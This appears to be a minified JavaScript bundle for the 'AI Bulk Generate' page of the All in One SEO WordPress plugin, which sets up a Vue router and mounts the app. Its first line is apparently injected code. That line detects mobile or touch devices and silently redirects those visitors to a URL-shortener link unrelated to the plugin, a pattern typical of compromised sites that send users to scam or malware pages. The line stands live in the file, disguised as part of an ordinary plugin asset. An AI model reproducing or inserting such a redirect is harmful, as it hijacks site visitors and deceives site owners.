(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
const __vite__mapDeps=(i,m=__vite__mapDeps,d=(m.f||(m.f=[window.__aioseoDynamicImportPreload__("js/Main.27049b12.js"),window.__aioseoDynamicImportPreload__("js/vendor-vue-ui.232c7c36.js"),window.__aioseoDynamicImportPreload__("js/vendor-other.39e59221.js"),window.__aioseoDynamicImportPreload__("css/vendor-vue-ui.dbee72c8.css"),window.__aioseoDynamicImportPreload__("js/app-core.c8323d51.js"),window.__aioseoDynamicImportPreload__("js/vendor-lodash.03129cfe.js"),window.__aioseoDynamicImportPreload__("js/PostTypes.9ab2ae40.js"),window.__aioseoDynamicImportPreload__("js/Button.3cec2279.js"),window.__aioseoDynamicImportPreload__("js/_plugin-vue_export-helper.eefbdd86.js"),window.__aioseoDynamicImportPreload__("css/Button.2bf1deff.css"),window.__aioseoDynamicImportPreload__("js/Index.66db1786.js"),window.__aioseoDynamicImportPreload__("js/Tabs.ea329423.js"),window.__aioseoDynamicImportPreload__("js/ProBadge.7b829f47.js"),window.__aioseoDynamicImportPreload__("css/ProBadge.6500bcec.css"),window.__aioseoDynamicImportPreload__("js/Caret.aae02d8a.js"),window.__aioseoDynamicImportPreload__("js/Information.6ccba108.js"),window.__aioseoDynamicImportPreload__("js/Slide.f2114d9d.js"),window.__aioseoDynamicImportPreload__("css/Tabs.d9e8b805.css"),window.__aioseoDynamicImportPreload__("js/Index.b9859662.js"),window.__aioseoDynamicImportPreload__("js/Close.7fb523c8.js"),window.__aioseoDynamicImportPreload__("css/Index.74bb20a6.css"),window.__aioseoDynamicImportPreload__("js/Header.d2cbe877.js"),window.__aioseoDynamicImportPreload__("js/ScrollAndHighlight.5271fbff.js"),window.__aioseoDynamicImportPreload__("js/ScrollTo.f4df02aa.js"),window.__aioseoDynamicImportPreload__("js/LicenseKeyBar.0038e5e6.js"),window.__aioseoDynamicImportPreload__("js/LogoGear.93a225a7.js"),window.__aioseoDynamicImportPreload__("css/LicenseKeyBar.1c15fc37.css"),window.__aioseoDynamicImportPreload__("js/AnimatedNumber.f33b2226.js"),window.__aioseoDynamicImportPreload__("js/Logo.a4a419c3.js"),window.__aioseoDynamicImportPreload__("js/Trash.47f6fc0e.js"),window.__aioseoDynamicImportPreload__("css/Header.e8442b6b.css"),window.__aioseoDynamicImportPreload__("js/Support.d3586703.js"),window.__aioseoDynamicImportPreload__("js/Url.535116f6.js"),window.__aioseoDynamicImportPreload__("js/Pencil.683baab8.js"),window.__aioseoDynamicImportPreload__("js/Exclamation.179e5969.js"),window.__aioseoDynamicImportPreload__("js/Gear.1a6546a3.js"),window.__aioseoDynamicImportPreload__("css/Index.b249bc29.css"),window.__aioseoDynamicImportPreload__("css/main.7ed77203.css"),window.__aioseoDynamicImportPreload__("js/CreditCounter.fbbb453f.js"),window.__aioseoDynamicImportPreload__("js/Tooltip.569a23d9.js"),window.__aioseoDynamicImportPreload__("css/Tooltip.497e84ea.css"),window.__aioseoDynamicImportPreload__("css/CreditCounter.a4fc59dc.css"),window.__aioseoDynamicImportPreload__("css/Main.17e0b31a.css")])))=>i.map(i=>d[i]);
import{aq as r,f as a,i as s,a0 as i,an as p}from"./js/vendor-vue-ui.232c7c36.js";import{l as c}from"./js/index.98d01501.js";import{l as m}from"./js/index.2a5d16ad.js";import{l as _}from"./js/index.0d80c2c2.js";import{l}from"./js/app-core.c8323d51.js";import{_ as u}from"./js/_plugin-vue_export-helper.eefbdd86.js";import{_ as f,s as d}from"./js/dynamic-import-helper.c518af60.js";import{_ as v}from"./js/vendor-phone.2afdf77e.js";import{_ as g}from"./js/vendor-other.39e59221.js";import"./js/Button.3cec2279.js";import"./js/Input.af9b9f81.js";import"./js/Index.b9859662.js";import"./js/Close.7fb523c8.js";import"./js/Pencil.683baab8.js";import"./js/Trash.47f6fc0e.js";import"./js/Select.415eaf8e.js";import"./js/Caret.aae02d8a.js";import"./js/Toggle.29e2980f.js";import"./js/vendor-lodash.03129cfe.js";const y={},A={class:"aioseo-app"};function h(e,B){const n=r("router-view");return a(),s("div",A,[i(n)])}const k=u(y,[["render",h]]),P="all-in-one-seo-pack",w=e=>()=>f(Object.assign({"../views/Main.vue":()=>v(()=>import("./js/Main.27049b12.js"),__vite__mapDeps([0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42]),import.meta.url)}),`../views/${e}.vue`,3),x=[{path:"/:pathMatch(.*)*",redirect:"/"},{path:"/",name:"ai-bulk-generate",component:w("Main"),meta:{access:"aioseo_page_ai_content_settings",name:g("AI Bulk Generate",P)}}];let o=p({...k,name:"Pages/AiBulkGenerate"});o=c(o);o=m(o);o=_(o);const t=d(x,o);t.app=o;o.use(t);l(o,t);o.mount("#aioseo-app");
